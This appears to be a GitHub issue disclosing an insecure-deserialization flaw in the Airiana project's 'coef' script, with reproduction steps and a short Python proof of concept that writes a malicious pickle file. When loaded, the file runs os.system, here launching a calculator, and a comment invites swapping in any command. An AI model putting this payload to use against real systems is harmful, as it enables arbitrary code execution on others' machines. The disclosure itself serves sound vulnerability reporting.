Airiana icon indicating copy to clipboard operation
Airiana copied to clipboard
verified publisher icon BeamCtrl

Insecure Deserialization via pickle.load() in coef Leads to Remote Code Execution (RCE)

Open mohit121312 opened this issue 8 months ago • 0 comments

Describe the bug The coef script is vulnerable to insecure deserialization, leading to remote code execution (RCE). The script loads data from coeficients.dat using Python's pickle.load() without validating the contents, allowing an attacker to execute arbitrary code by replacing the .dat file with a malicious payload.

Vulnerable Code

https://github.com/BeamCtrl/Airiana/blob/ed778d6d8adc9b0fb86ccc5a9db9e23e6d996664/coef#L6-L7

To Reproduce Steps to reproduce the behavior:

  1. Clone the repository:

git clone https://github.com/BeamCtrl/Airiana

  1. Navigate to the coef directory:

cd Airiana

  1. Create the malicious coeficients.dat file using the following Python script:
import pickle
import os

class Evil:
    def __reduce__(self):
        return (os.system, ("gnome-calculator",))  # Replace with any OS command

payload = pickle.dumps(Evil())

with open("coeficients.dat", "wb") as f:
    f.write(payload)

it will generate this type of the data inside coeficients.dat

Image

  1. Run the vulnerable script:

python3 coef

5.Observe: Calculator or any arbitrary system command will be executed.

https://github.com/user-attachments/assets/f9701c40-73d9-4a8e-bbe9-8fd2af71f71c

mohit121312 avatar May 04 '25 07:05 mohit121312